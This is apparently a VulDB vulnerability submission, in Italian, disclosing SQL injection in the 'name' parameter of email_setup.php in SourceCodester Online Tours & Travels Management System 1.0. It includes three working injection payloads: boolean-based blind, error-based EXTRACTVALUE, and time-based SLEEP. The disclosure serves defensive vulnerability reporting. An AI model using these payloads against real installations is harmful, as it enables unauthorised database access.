Invia #249801: SourceCodester SourceCodester Online Tours & Travels Management System 1.0 Sql injectioninformazioni

TitoloSourceCodester SourceCodester Online Tours & Travels Management System 1.0 Sql injection
DescrizioneSourceCodester Online Tours & Travels Management System email_setup.php sql injection Url: admin/email_setup.php Abstract: Line 37 of email_setup.php invokes a SQL query built using unvalidated input. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands. Explanation: SQL injection errors occur when: Data enters a program from an untrusted source. The data is used to dynamically construct a SQL query. In this case the data is passed to prepare() in email_setup.php at line 37. Parameter: name (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: name=Mayuri K.' RLIKE (SELECT (CASE WHEN (6196=6196) THEN 0x4d6179757269204b2e ELSE 0x28 END)) AND 'uWJN'='uWJN&mail_driver_host=mail.gmail.com&mail_port=587&[email protected]&mail_password=programmers324&update= Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: name=Mayuri K.' AND EXTRACTVALUE(6478,CONCAT(0x5c,0x71706a7671,(SELECT (ELT(6478=6478,1))),0x717a6b6a71)) AND 'UqZk'='UqZk&mail_driver_host=mail.gmail.com&mail_port=587&[email protected]&mail_password=programmers324&update= Type: time-based blind Title: MySQL >= 5.0.12 RLIKE time-based blind Payload: name=Mayuri K.' RLIKE SLEEP(5) AND 'beie'='beie&mail_driver_host=mail.gmail.com&mail_port=587&[email protected]&mail_password=programmers324&update= Download Code: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html
Fonte⚠️ https://blog.csdn.net/xitanging/article/details/134903112
Utente
 zhouwenjie1221 (UID 59880)
Sottomissione09/12/2023 17:10 (3 anni fa)
Moderazione13/12/2023 10:23 (4 days later)
StatoAccettato
Voce VulDB247895 [SourceCodester Online Tours & Travels Management System 1.0 email_setup.php prepare Nome iniezione SQL]
Punti20

PrecedenteVisione D'ensembleIl prossimo

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!